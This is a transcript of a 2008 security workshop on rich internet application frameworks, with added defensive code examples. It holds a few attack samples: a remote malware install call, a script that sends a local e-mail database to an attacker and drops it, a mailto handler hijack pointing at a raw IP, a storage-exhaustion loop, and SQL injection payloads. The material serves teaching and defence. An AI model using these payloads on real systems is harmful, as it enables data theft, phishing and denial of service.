RIA And AJAX Security Workshop, Part 2

Information about RIA And AJAX Security Workshop, Part 2
Technology

Published on October 20, 2008

Author: astamos

Source: slideshare.net

Description

This is Part 2 of the RIA and AJAX Security workshop at Web 2.0 Expo Europe. This part is about RIA security.

RIA Security Workshop: Blurring the Line between Web and Desktop Security
Alex Stamos, David Thiel, Justine Osborne
iSEC Partners
21 October, 2008
Stamos, Thiel, Osborne (iSEC Partners) RIA and AJAX Security Workshop - Part 2 Web 2.0 Expo Europe 1 / 90

Outline
1. Introduction: Who are we? What’s a RIA? Why use RIA?
2. RIA Frameworks: Adobe AIR, MS Silverlight, Google Gears, Y! BrowserPlus, Mozilla Prism, HTML 5
3. Attack Scenarios: RIA vs OS, RIA vs the web

What’s a RIA?
“Rich Internet Applications”
- As with “Web 2.0”, ill-defined
- May contain some of the following ingredients:
  - AJAXy Flashiness
  - Local storage
  - “Offline mode”
  - Decoupling from the browser
  - Access to lower level OS resources: sockets, hardware devices
  - Appearance of a traditional desktop application
- Our research has shown a huge disparity in features and security design

What’s a RIA? Party like it’s 1997
- Constantly updating content!
- Push technology!
- No more browsers!

Why use a RIA?
- “Web 2.0” no longer gets you VC funding
- To increase responsiveness—distribute data stores between server and client
- Desktop integration—take advantage of OS UI functionality
- Never learned any real programming languages
In short, web developers can now write full “desktop” apps. This could be good or bad.

RIA Frameworks
- Adobe AIR
- Microsoft Silverlight
- Google Gears
- Yahoo! BrowserPlus™
- Mozilla Prism

RIA Frameworks: Fight!

Adobe AIR Quick Summary (checklist; the slide’s yes/no marks are not preserved in this text)
- Runs disconnected
- Standalone app
- Privileged OS access
- Can launch itself
- Local data storage
- Has an installer
- Raw network sockets
- Cross-domain XHR
- Dedicated session management
- Can talk to the calling DOM
- IPC mechanisms
- Proper SSL security

What is Adobe AIR?
- Full-featured desktop runtime based upon Adobe Flash technology
- Cross-browser, cross-platform
- Applications can be created with: Adobe Flex 3, Adobe Flash CS3, or HTML and JS using free tools
- AIR intended to be more powerful than a browser-based RIA
- There is no sandbox around the application
- AIR apps run with the full powers of the user

What is Adobe AIR?
- So it’s just like a Win32 program in the eyes of a security analyst? Um, not really
- Power of AIR is the “I” in “RIA”
- Can be invoked by browser with arguments, like ActiveX or Flash
- Has many native mechanisms for loading external content
- Highly likely that developers will utilize Internet content. That’s the point.

What is Adobe AIR?
- AIR is best thought of as an ActiveX or Full Trust .Net analogue and not like Flash++
- Code runs with full privileges, can install malware
- Native mechanisms allow for interaction with untrusted world
- Fortunately, Adobe seems to have learned some lessons from ActiveX

Adobe AIR Instantiation
- AIR applications are identified by an appID and pubID
- pubID calculated from developer personal information and certificate
- SWF files can import functionality that allows them to interact with AIR applications. From Adobe:

    airSWFLoader.load(new URLRequest("http://airdownload.adobe.com/browserapi/air.swf"), loaderContext);

Adobe AIR Instantiation
- With airSWF classes, the SWF can check on the application’s install status and version:

    airSWF.getApplicationVersion(appID, pubID, versionDetectCallback);

- Now that we know the version, we can instantiate:

    airSWF.launchApplication(appID, pubID, arguments);

Adobe AIR Security Model
- By default, code included in an AIR application has full rights
- New functionality in privileged APIs added to JavaScript and ActionScript
- Some restrictions on interacting with desktop in AIR 1.0
- Existing capabilities can be chained to run native code
- Rumors of additional native code capabilities in future releases

Adobe AIR Security Model
- No “code access security” model as understood on other systems, such as Java or .Net
- Instead, five pre-defined sandboxes with fixed capabilities:
  - Application — Full perms. Default for code included with AIR app
  - Remote — Code downloaded from internet. Browser-like permissions
  - Three intermediate permissions for local SWFs

Adobe AIR Security Model
- AIR has many ways of loading executable content to run, such as HTML/JS and SWFs
- Also many ways of getting external untrusted data:
  - Network traffic
  - Arguments from browser invocation
  - Command line arguments
- Application Sandbox is not supposed to be able to dynamically generate code; eval() is the best example in JS
- Goal is to eliminate the XSS and injection attacks that have plagued Flash apps, and that have much more kick when the code runs with local privileges

Adobe AIR Security Model
- Default for remotely loaded code is Remote sandbox
  - Cannot access new dangerous classes, like FileStream()
  - Can access eval() and other dynamic methods
  - Can be granted cross-domain XHR
- Should be sufficient for most of the content developers would want from the Internet, such as HTML or movie SWFs

Adobe AIR Security Model
- Seems like a reasonable security precaution. How will web developers circumvent it?
- They can look for mistakes in Adobe’s classification of methods
- Better yet, use a Sandbox Bridge:
  - Official method of moving data between sandboxes
  - An application can attach functions or variables to an object available from multiple sandboxes
  - Documented as passing by value, not reference, although this doesn’t jibe with how functions work

Adobe AIR Security Model
First the parent sets up the Sandbox Bridge:

    var highRightsStuff = {};
    highRightsStuff.writeToFile = function(name, content) {
        // Write to file with air.FileStream
    };
    document.getElementById("child").contentWindow.parentSandboxBridge = highRightsStuff;

Then child code (in an iFrame) can access the function:

    window.parentSandboxBridge.writeToFile(name, content);
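The slide’s bridge hands remote content a raw file-writing capability. The following added example (not code from the slides or from Adobe) models the same pattern in plain JavaScript with an in-memory stand-in for air.FileStream, and puts a narrowed bridge beside it: the exposed function becomes the policy (confined directory, allow-listed names, string-only content) rather than the capability. FakeFileSystem, makeRawBridge, makeSafeBridge and the paths are assumptions for the example.

```javascript
"use strict";

// Stand-in for the desktop file system the Application sandbox can reach
// (constructed fixture; AIR would use air.FileStream).
class FakeFileSystem {
  constructor() { this.files = new Map(); }
  write(path, content) { this.files.set(path, content); }
  read(path) { return this.files.get(path); }
}

// Resolve "." and ".." segments against a base directory (POSIX-style).
function normalizePath(base, name) {
  const out = [];
  for (const p of (base + "/" + name).split("/")) {
    if (p === "" || p === ".") continue;
    if (p === "..") { out.pop(); continue; }
    out.push(p);
  }
  return "/" + out.join("/");
}

// The slide's pattern: the parent hands the child a privileged function.
// Whatever name the remote content supplies is written, wherever the user can write.
function makeRawBridge(fs, appHome) {
  const highRightsStuff = {};
  highRightsStuff.writeToFile = function (name, content) {
    fs.write(normalizePath(appHome, name), content);
    return true;
  };
  return highRightsStuff;
}

// Narrowed bridge with the same shape:
//  - writes are confined to one directory under the app's storage area
//  - names come from a small allow-listed character set with no path separators
//  - content must be a string and is length-capped (no objects or functions cross the bridge)
//  - the bridge object is frozen so the child cannot attach new members to it
function makeSafeBridge(fs, appHome, opts = {}) {
  const dir = normalizePath(appHome, opts.subdir || "remote-data");
  const maxBytes = opts.maxBytes || 64 * 1024;
  const nameRe = /^[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,8})?$/;
  const bridge = {};
  bridge.writeToFile = function (name, content) {
    if (typeof name !== "string" || !nameRe.test(name)) return false;
    if (typeof content !== "string" || content.length > maxBytes) return false;
    const target = normalizePath(dir, name);
    // Belt and braces: refuse anything that still resolves outside the directory.
    if (!target.startsWith(dir + "/")) return false;
    fs.write(target, content);
    return true;
  };
  return Object.freeze(bridge);
}

// What Remote-sandbox content can achieve through each bridge (all paths constructed).
function bridgeDemo() {
  const fs = new FakeFileSystem();
  const home = "/Users/alice/Library/Application Support/ExampleAir";
  const raw = makeRawBridge(fs, home);
  const safe = makeSafeBridge(fs, home);
  const traversal = "../../Preferences/com.example.plist";
  return {
    rawEscaped: raw.writeToFile(traversal, "x") &&
      fs.read("/Users/alice/Library/Preferences/com.example.plist") === "x",
    safeRejectedTraversal: safe.writeToFile(traversal, "x") === false,
    safeRejectedNonString: safe.writeToFile("notes.txt", { toString() { return "obj"; } }) === false,
    safeAccepted: safe.writeToFile("notes.txt", "hello") &&
      fs.read(home + "/remote-data/notes.txt") === "hello",
  };
}
```

The raw bridge lets the child write to a path of its choosing; the narrowed one only ever writes allow-listed names inside remote-data.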

Installing AIR
- AIR requires Flash 9
- Can be installed via external binary or inside of Flash:

Installing an AIR Application
- AIR applications can be bundled as binaries (*.air)
- Can also be installed by a web page from inside a SWF:

    var url:String = "http://www.cybervillains.com/malware.air";
    var runtimeVersion:String = "1.0";
    var arguments:Array = ["launchFromBrowser"];
    airSWF.installApplication(url, runtimeVersion, arguments);

- Creates an Open/Save prompt

Installing an AIR Application
- Adobe supports signing AIR applications with commercial certificates
- Gives you this prompt:
- Notice the default selection

Installing an AIR Application
- Unfortunately, they also support self-signed certificates
- Gives you this prompt:

Installing an AIR Application
- Actually, looks more like pre-IE7 ActiveX
- What am I complaining about? They give the correct information
- True, but so did ActiveX
- Allowing users to install signed applets is dangerous enough
- Allowing self-signed (which is the same as unsigned) is terrifying
- The popularity of ActiveX in IE5 and IE6 and the ability of web sites to pop open infinite prompts made it the premier malware seeding mechanism
- Adobe Flash is more popular than IE ever was
- It’s almost impossible to install ActiveX now. That’s not an accident.

Installing an AIR Application: Some suggestions
- Change default action
- Add a countdown timer to discourage mindless clickthrough
- There is already a registry key to disable unsigned install prompts; turn it on by default
- Stop distributing self-signed AIR applications from Adobe.com
- There is perhaps room for something between AIR and Flash without the rootkit abilities

Questions about Silverlight (checklist; the slide’s yes/no marks are not preserved in this text)
- Runs disconnected
- Standalone app
- Privileged OS access
- Can launch itself
- Local data storage
- Has an installer
- Raw network sockets
- Cross-domain XHR
- Dedicated session management
- Can talk to the calling DOM
- IPC mechanisms
- Proper SSL security

What is Silverlight?
- Cross browser plugin comparable in functionality to Flash
- Subset of the .NET framework
- Two versions:
  - Silverlight 1.0: released
  - Silverlight 2.0: beta 2

Silverlight Bits
- .XAP: .ZIP container for Silverlight apps
- XAML: Extensible Application Markup Language
- CoreCLR: CLR for .NET lite (with enhanced CAS)
- XBAP: XAML Browser Applications (CAS)

XAML

    <Canvas Width="600" Height="500" Background="AntiqueWhite"
            xmlns="http://schemas.microsoft.com/client/2007"
            xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
      <StackPanel Width="600">
        <Image Source="plan.jpg" />
        <StackPanel Orientation="Horizontal">
          <TextBlock Height="45" FontSize="18">Bigger Cat</TextBlock>
          <Slider Value="2" Minimum="1" Maximum="10" Height="45" Width="400"
                  HorizontalAlignment="Center" VerticalAlignment="Bottom"></Slider>
          <TextBlock FontSize="18" Height="45">Smaller Cat</TextBlock>
        </StackPanel>
      </StackPanel>
    </Canvas>

XAML in Action

Silverlight Security Model: Silverlight’s Simplified Code Access Security
- SecurityTransparent—Silverlight developer code, sans attribute
- SecuritySafeCritical—New bridge code from Microsoft
- SecurityCritical—Slimmed .NET 3

Isolated Storage
This code will silently fail:

    using System.IO;

This code will succeed:

    using System.IO;
    using System.IO.IsolatedStorage;

    IsolatedStorageFile isf = IsolatedStorageFile.GetUserStoreForApplication();
    isf.CreateFile("relativePath");

Isolated Storage: What could go wrong?
- SecuritySafeCritical code fails us (Microsoft’s fault)
- Threading DoS attacks against local system

Isolated Storage
- The default storage quota is 1 MB per application
- Two applications cannot access each other’s storage
- Storage is isolated based on AppDomain

Silverlight Security, File System: What could go wrong?
- DoS against the user
- Sensitive file names like COM3 and prn

Silverlight Security, File System
- You can deny local storage

Interaction with the Operating System: Network Sockets
- Network sockets are available to Silverlight applications through the System.Net.Sockets namespace
- Currently only supports TCP sockets
- Socket connections can only push data to the client
- Socket connections require clientaccesspolicy.xml (even to host of origin) served from port 943

Network Sockets: What could go wrong?
- More DoS
- Policy file requests

Cross-domain Access
- initParams issues, XSS, insecure inclusion, HTML bridge
- Breaking the same origin policy with files
- Cross domain issues, CSRF, web services architecture:

    <?xml version="1.0" encoding="utf-8"?>
    <access-policy>
      <cross-domain-access>
        <policy>
          <allow-from http-request-headers="*">
            <domain uri="*"/>
          </allow-from>
          <grant-to>
            <resource path="/" include-subpaths="true"/>
          </grant-to>
        </policy>
      </cross-domain-access>
    </access-policy>
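The policy on the slide opens the whole site to any origin with any request header. The following added example (not from the slides or from Microsoft) is a small auditor that flags those three settings and shows a tightened policy beside the wide one; it scans only the allow-from, domain and resource elements with regular expressions rather than parsing XML generally, and both policies are constructed fixtures.

```javascript
"use strict";

// The slide's policy: any origin, any header, the whole site (constructed copy).
const WIDE_POLICY = `<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>`;

// A tightened policy: one HTTPS caller, one named header, one service path (constructed).
const NARROW_POLICY = `<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="SOAPAction">
        <domain uri="https://app.example.com"/>
      </allow-from>
      <grant-to>
        <resource path="/services/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>`;

// Extract attr="value" pairs from the attribute text of one tag.
function attrs(tagBody) {
  const out = {};
  const re = /([\w:-]+)\s*=\s*"([^"]*)"/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) out[m[1]] = m[2];
  return out;
}

// Returns a list of {severity, issue} findings; an empty list means nothing flagged.
function auditClientAccessPolicy(xml) {
  const findings = [];
  // <allow-from>: which request headers a cross-domain caller may set
  for (const m of xml.matchAll(/<allow-from\b([^>]*)>/g)) {
    const headers = (attrs(m[1])["http-request-headers"] || "").split(",").map(s => s.trim());
    if (headers.includes("*")) {
      findings.push({ severity: "high", issue: 'allow-from permits arbitrary request headers (http-request-headers="*")' });
    }
  }
  // <domain>: which origins may call
  for (const m of xml.matchAll(/<domain\b([^>]*)\/?>/g)) {
    const uri = attrs(m[1]).uri || "";
    if (uri === "*") {
      findings.push({ severity: "high", issue: 'domain uri="*" lets any site make cross-domain calls' });
    } else if (uri.startsWith("http://")) {
      findings.push({ severity: "medium", issue: `domain ${uri} is trusted over plaintext HTTP; a network attacker can impersonate it` });
    }
  }
  // <resource>: how much of the site is exposed
  for (const m of xml.matchAll(/<resource\b([^>]*)\/?>/g)) {
    const a = attrs(m[1]);
    if (a.path === "/" && a["include-subpaths"] === "true") {
      findings.push({ severity: "medium", issue: 'resource path="/" with include-subpaths exposes the whole site, not just the service endpoints' });
    }
  }
  return findings;
}
```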

Questions about Gears (checklist; the slide’s yes/no marks are not preserved in this text)
- Runs disconnected
- Standalone app
- Privileged OS access
- Can launch itself
- Local data storage
- Has an installer
- Raw network sockets
- Cross-domain XHR
- Dedicated session management
- Can talk to the calling DOM
- IPC mechanisms
- Proper SSL security

Google Gears
- Uses a homegrown API for synchronizing data
- Local SQLite instance used for data storage
- LocalServer hosts content locally for offline access
- Works offline via SQL database, local assets, and a local app server, LocalServer
  - LocalServer acts as a broker between the browser and webserver
  - Changes behavior depending on online status
- Implements a WorkerPool to perform intensive Javascript calculations outside of the browser

Google Gears: Security mechanisms
- Uses same origin to restrict access to site databases and LocalServer resource capture
- Provides for parameterized SQL
- Opt-in user dialog
- Gears 0.3 allows for “customization” of this dialog. . .

Google Gears: Not a great “feature”. . .

Google Gears: Workerpool botnets
- Workerpools allow intensive tasks that would normally trigger tight loop detection to run uninterrupted
- Due to the ease of tricking users into installing Gears apps, makes an attractive target for botnets
- Applications for hash cracking, remote site attacks

Questions about Yahoo! BrowserPlus™ (checklist; the slide’s yes/no marks are not preserved in this text)
- Runs disconnected
- Standalone app
- Privileged OS access
- Can launch itself
- Local data storage
- Has an installer
- Raw network sockets
- Cross-domain XHR
- Dedicated session management
- Can talk to the calling DOM
- IPC mechanisms
- Proper SSL security

Yahoo! BrowserPlus™: A challenger appears
- “To address security, we’ve followed the same web security precedent set by browser developers.”
- But it’s even worse than that. . .
- Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js
- No, you can’t do that over SSL

Yahoo! BrowserPlus™: Architecture
- Runs as a browser plugin, with a separate helper process
- Allows pages to request handy “corelets”, installed on-demand, like:
  - Imagemagick for local image processing
  - Flickr uploadr
  - Notifications via Growl/Snarl
  - and a Ruby interpreter
- These execute code on the local machine as the current user
- In short, it’s ActiveX--

Yahoo! BrowserPlus™: About this Ruby business. . .
- Included version: 1.8.6p0
- Perfectly safe, as long as you don’t use strings or arrays

Yahoo! BrowserPlus™: Of course, BrowserPlus™ isn’t totally baked yet
- In “Sneak Peek” phase
- Currently, only works with Yahoo! sites
- All modules must be signed by Yahoo!
- Also lacks some “polish”. . .

    <span class="description">
      A description of the componennt ooga booga momma bite me yeah yeah yeah.

↑ Actual Yahoo! content

Yahoo! BrowserPlus™: Summary
- This is a bad idea.
- Allows for buggy native code apps of any type to be deployed with no sandboxing or sitelocking.
- All runs as a browser plugin rather than an extension or control: full privilege.
- Corelets are signed, but can overwrite each other after signature verification (and be updated dynamically)
- Bad code can supposedly be revoked, but it can override revocation mechanisms.
- Bottom line—can’t ship in current state

Mozilla Prism Quick Summary (checklist; the slide’s yes/no marks are not preserved in this text)
- Runs disconnected
- Standalone app
- Privileged OS access
- Can launch itself
- Local data storage
- Has an installer
- Raw network sockets
- Cross-domain XHR
- Dedicated session management
- Can talk to the calling DOM
- IPC mechanisms
- Proper SSL security

Mozilla Prism
- Formerly WebRunner—wraps webapps to appear as desktop apps
- “Standalone” browser instance, restricted to one domain
- External links open a regular browser
- Separate user profile
- Certificate errors are a hard failure

Mozilla Prism
Consists of a webapp bundle with id, URI, CSS, scripting and UI rules in an INI:

    [Parameters]
    id=isec.site@isecpartners.com
    uri=https://www.isecpartners.com/
    icon=isec
    status=no
    location=no
    sidebar=no
    navigation=no

Mozilla Prism: Example bundles

Mozilla Prism: Bundles
- Javascript included with webapp bundles has full XPCOM privs (but not content scripting privs)
- Script in 3rd-party bundles allows modifying browser behavior just like an extension
- Unlike add-ons, no mechanism for signing or verifying goodness of webapp bundles

Mozilla Prism: Prism Install UI

Mozilla Prism: Abuse
- Looks like a bookmark dialog
- No warnings for install
- Full XPCOM scripting privileges
- Low bar for trojans and malicious code—a malicious browser extension, but with no code signing or warning

Mozilla Prism: Abuse
- Not only that, but the sandboxing isn’t real
- Prism apps can script all kinds of things
- In 0.8, a malicious Prism app can change preferences affecting all other Prism apps
- . . . like proxy configuration, for example. . . oops.

HTML 5
- New “features” in Firefox and WebKit
- Introduces DOM storage—sessionStorage and localStorage
  - sessionStorage stores arbitrary amounts of data for a single session
  - localStorage persists beyond the session — never expires, limited to 5M
- Database storage via openDatabase()
- All expected to be same-origin

DOM Storage
- The major goals of DOM storage—more storage space and real persistence
- Cookies considered too small
- Users delete cookies, or won’t accept them
- DOM storage bypasses pesky users
- However, pesky users can use: about:config, dom.storage.enabled = false

Browser-based SQL Databases: DatabaseJacking
Injection attacks become far more damaging when you can insert code like this:

    var db = openDatabase("e-mail", [], "My precious e-mail", "3.14");
    allmessages = db.executeSql("SELECT * FROM MSGS", [], function(results) {
        sendToAttacker(results);
    });
    db.executeSql("DROP TABLE MESSAGES", [], function() {
        alert("lol");
    });

Firefox 3: Mozilla-specific issues
- Cross-Site XMLHttpRequest—removed in late FF3 betas, but it may return
- globalStorage
  - FF2 has weak same-origin restrictions
  - FF2 and FF3 both omit any UI to view/change/delete
  - Deprecated in HTML 5 for localStorage
- The RIA world is totally SQL-happy
  - Downloads, cookies, form history, search history, etc, all stored in local SQLite databases
  - Why?? This data isn’t relational.

Firefox 3: Additional fun
- Speaking of tracking and data storage. . . Did you have History turned off? FF3 may have turned it back on.
- Also new in FF3:
  - nsIdleService—idle tracking through XPCOM
  - EXSLT—eXtensible Stylesheet Language Transformations weren’t extensible enough, so here are the extensions. Thankfully, XSLT has been bug-free.
  - Websites can now be protocol handlers—a novel way to implement spyware

Firefox 3: Protocol Handlers
- Set up a dumb proxy, forwarding traffic to the real handler IP (and rewriting Host: headers)
- Register a new protocol handler thusly:

    <script type="text/javascript">
    navigator.registerProtocolHandler("mailto",
        "http://123.142.120.129:8080/dc/launch?action=compose&To=%s",
        "Yahoo! Mail");
    </script>

- Use your malicious IP instead of a name, users won’t know the difference
- The only “security” restriction is that the handler has to go to the domain trying to install it.

Firefox 3: Protocol handler registration
- Installation of a protocol handler is one-click—only one option.

Firefox 3: Launching a malicious handler
- After a handler is installed, mailto: links offer the malicious handler
- Note nearly invisible host URI and the auto-fetched favicon—which would you pick in a hurry?
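The slides note that the only restriction Firefox 3 applies is that the handler must point at the registering domain. The following added example (not from the slides or from Mozilla) models the stricter checks a browser or a site’s own content policy could apply to a registerProtocolHandler call, run against the slide’s registration and a clean one; the rule set and checkHandlerRegistration are assumptions for the example, not any browser’s implementation.

```javascript
"use strict";

const IPV4_LITERAL = /^\d{1,3}(\.\d{1,3}){3}$/;
// Schemes a web page may plausibly handle; anything else (http, file, javascript, ...) is refused.
const SAFE_SCHEMES = new Set(["mailto", "irc", "ircs", "magnet", "news", "sms", "tel", "webcal", "xmpp"]);

// Returns a list of problems; an empty list means the registration would be accepted.
function checkHandlerRegistration(pageOrigin, scheme, template, title) {
  const problems = [];
  if (!SAFE_SCHEMES.has(String(scheme).toLowerCase())) problems.push("scheme not on allow list");
  let url;
  try { url = new URL(template); } catch { return ["template is not a valid URL"]; }
  const page = new URL(pageOrigin);
  // The one rule the slide reports Firefox 3 enforcing: handler and registering page share an origin.
  if (url.origin !== page.origin) problems.push("handler origin differs from registering page");
  // Additional rules the slide's scenario motivates.
  if (url.protocol !== "https:") problems.push("handler is not https");
  if (IPV4_LITERAL.test(url.hostname) || url.hostname.startsWith("[")) problems.push("handler host is an IP literal");
  if ((template.match(/%s/g) || []).length !== 1) problems.push("template must contain exactly one %s");
  if (!/^[\w .!-]{1,40}$/.test(String(title))) problems.push("title is empty or contains unusual characters");
  return problems;
}
```

Because the slide's handler is registered from the same IP-literal origin it points at, the same-origin rule alone passes it; the https and IP-literal rules are what stop it.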

WebKit: The Lurking Menace
- Used in Safari, iPhone, Nokia, Android, OpenMoko, Konqueror, and AIR
- Supports HTML 5 DOM storage mechanisms
- Early adopter of local database objects
- Particularly crucial on mobile devices, where storage is at a premium

Inherent DoS Risks in HTML 5
- 5M per origin for database objects
- 5M per origin for localStorage
- 5M per origin for globalStorage (in Firefox)
- Thankfully, no one has hundreds of thousands of origins
  - Except people on internal class A networks
  - Or anyone with wildcard DNS
- Trivial storage exhaustion attacks possible
- Even more so for mobile devices based on WebKit—plus, storage and RAM are often pooled on these
- Almost no exposed UI to disable this

DoS Risks in HTML 5: Attack Scenarios
- Attacker sets up or compromises web server with wildcard DNS
- Upon page visitation of the main virtual host, an IFRAME loads which runs Javascript like this:

    function storethings(name) {
        globalStorage['cybervillains.org'][name] = "Hi there, from iSEC!";
    }

    function mul0(str, num) {
        if (!num) return "";
        var newStr = str;
        while (--num) newStr += str;
        return newStr;
    }

    var i = 0;
    while (i < 10000) {
        whee = mul0("A", 10000);
        storethings(whee + i);
        i++;
    }

DoS Risks in HTML 5: Attack Scenarios
- Each request loads a page instantiating globalStorage and/or localStorage and database objects
- Fill the victim’s hard drive with incriminating evidence— base64-encoded images/files, etc. . .
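The slides’ point is that a per-origin quota is meaningless once wildcard DNS makes origins free. The following added example (not from the slides or from any browser) models quota enforcement that also caps the total across all origins of one registrable domain and across the whole profile, then replays the wildcard scenario against it. StorageBudget, the per-site and total limits, and the tiny public-suffix sample inside registrableDomain() are assumptions for the example; a real implementation would use the full Public Suffix List.

```javascript
"use strict";

const MB = 1024 * 1024;
// Tiny constructed sample of two-label public suffixes; the real list is much longer.
const TWO_LEVEL_SUFFIXES = new Set(["co.uk", "org.uk", "com.au", "co.jp"]);

// eTLD+1 of a host name, e.g. a1.cybervillains.org -> cybervillains.org (simplified).
function registrableDomain(host) {
  const labels = host.toLowerCase().split(".");
  if (labels.length < 2) return host.toLowerCase();
  const take = TWO_LEVEL_SUFFIXES.has(labels.slice(-2).join(".")) ? 3 : 2;
  return labels.slice(-take).join(".");
}

// "https://a1.cybervillains.org:8443/x" -> "a1.cybervillains.org" (port ignored for grouping)
function originHost(origin) {
  return origin.replace(/^[a-z]+:\/\//i, "").split("/")[0].split(":")[0];
}

class StorageBudget {
  constructor(limits = {}) {
    this.perOrigin = limits.perOrigin ?? 5 * MB; // the per-origin figure the slides report
    this.perSite = limits.perSite ?? 20 * MB;    // added: cap over every origin of one site
    this.total = limits.total ?? 200 * MB;       // added: cap over the whole profile
    this.byOrigin = new Map();
    this.bySite = new Map();
    this.used = 0;
  }
  // Returns "ok" when the write fits, otherwise the name of the limit that stopped it.
  request(origin, bytes) {
    const site = registrableDomain(originHost(origin));
    const o = this.byOrigin.get(origin) || 0;
    const s = this.bySite.get(site) || 0;
    if (o + bytes > this.perOrigin) return "per-origin";
    if (s + bytes > this.perSite) return "per-site";
    if (this.used + bytes > this.total) return "total";
    this.byOrigin.set(origin, o + bytes);
    this.bySite.set(site, s + bytes);
    this.used += bytes;
    return "ok";
  }
  usedBySite(host) { return this.bySite.get(registrableDomain(host)) || 0; }
}

// Replay the slide's scenario: thousands of wildcard-DNS origins each asking for a full 5 MB.
function wildcardFloodDemo(originCount) {
  const budget = new StorageBudget();
  const outcomes = { ok: 0, "per-origin": 0, "per-site": 0, total: 0 };
  for (let i = 0; i < originCount; i++) {
    outcomes[budget.request(`https://a${i}.cybervillains.org`, 5 * MB)]++; // constructed hosts
  }
  return { outcomes, siteBytes: budget.usedBySite("cybervillains.org") };
}
```

With only the per-origin rule every one of the 10,000 origins would be granted 5 MB (50 GB); with the site cap the flood stops at 20 MB.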

Other HTML 5 features not yet implemented
- Coming soon to a browser near you
- TCP Connections! Direct ones and broadcast.
- HTML 5 Specification Draft, Section 7.3.8, Security: “Need to write this section.” [3]
- Yes.

RIA vs OS: Storage
- All of these frameworks expand the capabilities to store data locally
- Introduce privacy/tracking concerns
- DoS risk against desktops and mobile devices

RIA vs OS: Malware
- Adobe AIR is a desktop application framework
- AIR can easily seed malware
- The effectiveness of malware attacks will be directly related to the popularity of the platform and the ease of install
- Large media attack surfaces pose another option

RIA vs the web (or vice versa)
- Most RIA frameworks and HTML 5 include mechanisms for SQL-based storage
- XSS now has access to huge, easily retrievable data stores, often pre-login
- Retrieving query parameters from untrusted sources can now lead to SQL injection
- CSRF from the RIA app to the browser usually still possible
- Silverlight and AIR accept input from calling sites, opening Flash-like XSS and XSF vulns

RIA vs RIA
- In the case of Prism, “sandboxed” apps can affect each other, and the browser
- In the case of BrowserPlus™, modules can clobber each other and other parts of the machine
- Done improperly, multiple frameworks allow for “bridging” apps, breaking outside of the sandbox
- Prism allows for developer foot-shooting by letting web pages talk to Chrome [4]

Security Checklist: RIA Developers
- Prevent predictably named data stores: use a per-user GUID embedded in a dynamically generated page
- Parameterize SQL statements
- Lock your app to your domain if possible
- Beware of passed-in arguments. Don’t use them in JavaScript or to fetch URLs
- Be very careful with sandbox bridging. Don’t get cute about bypassing the AIR security model or crossing Mozilla privileged/unprivileged code boundaries
- Use Flex or Flash if you don’t need the local power of AIR . . . and you probably don’t
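The “SQL-based storage” attack from the RIA vs the web slide and the “parameterize SQL statements” checklist item, shown in working code. This is an added example, not code from the iSEC slides: AIR’s local database and the HTML 5 / Web SQL draft both hand page script an SQLite database, so an in-memory Python sqlite3 database stands in for that local store here. The table name, columns, sample rows and attacker payloads are constructed for the demo.

```python
"""Client-side SQL injection against a local (SQLite-backed) RIA data store.

Added example, not from the slides. The 'contacts' table, its rows and the
payloads below are constructed for the demo; the sqlite3 in-memory database
models the SQLite store that AIR and Web SQL expose to page script.
"""
import sqlite3


def build_store() -> sqlite3.Connection:
    """Create a throwaway local store pre-filled with constructed sample rows.

    In a real RIA this data would already sit on disk, readable pre-login
    by anything that can run script in the app's origin (e.g. via XSS).
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (owner TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO contacts VALUES (?, ?)",
        [("alice", "alice@example.net"),   # constructed sample data
         ("bob", "bob@example.net"),
         ("carol", "carol@example.net")],
    )
    return conn


def lookup_concatenated(conn: sqlite3.Connection, owner: str) -> list:
    """VULNERABLE: the caller-supplied value is spliced into the SQL text.

    This is the pattern the slides warn about when query parameters come
    from untrusted sources (URL fragments, postMessage, passed-in args).
    """
    sql = "SELECT email FROM contacts WHERE owner = '" + owner + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, owner: str) -> list:
    """Hardened: the value travels as a bound parameter, never as SQL text,
    so quotes, OR and UNION in it are just characters in a string."""
    sql = "SELECT email FROM contacts WHERE owner = ?"
    return [row[0] for row in conn.execute(sql, (owner,))]


# Constructed attacker inputs.
TAUTOLOGY_PAYLOAD = "' OR '1'='1"
# Dumps table names from SQLite's catalog; '--' comments out the closing quote.
SCHEMA_PAYLOAD = "' UNION SELECT name FROM sqlite_master WHERE type='table' --"


def demo() -> dict:
    """Run both payloads through both lookups and return what each leaked."""
    conn = build_store()
    return {
        "leaked_rows": lookup_concatenated(conn, TAUTOLOGY_PAYLOAD),   # every email
        "leaked_schema": lookup_concatenated(conn, SCHEMA_PAYLOAD),    # table names
        "safe_rows": lookup_parameterized(conn, TAUTOLOGY_PAYLOAD),    # []
        "safe_schema": lookup_parameterized(conn, SCHEMA_PAYLOAD),     # []
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The concatenated version returns every stored address for the tautology payload and the table catalog for the UNION payload; the parameterized version returns nothing for either, because the bound value is compared literally against the owner column. The same distinction applies to AIR’s SQLStatement parameters and Web SQL’s executeSql argument array.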

Security Checklist: RIA Framework Vendors

Local Storage Security
- Let users opt out. User choice is missing here
- Cookies have been opt-out for ages, but other tracking mechanisms haven’t caught up
- Limit storage invocations: 5 MB per origin is way too much without user interaction, especially on mobile devices

RIA Framework Vendors: Install Mechanisms
- Learn from Microsoft’s mistakes: they invented RIA with ActiveX
- ActiveX’s legacy: malware
- Bad guys can get certs. We have a code signing cert from Verisign, and we’re professional bad guys

RIA Framework Vendors: Install Mechanisms (continued)
- Users will click yes enough to invite abuse
- We need to start taking security UI seriously
- Do not allow self-signed anything without setting an external developer bit
- Install needs to take longer
- Watch out for install window DoSing to force a “yes”
- Using .exe download and install as the baseline is not acceptable
- RIA frameworks need an equivalent to ActiveX killbits

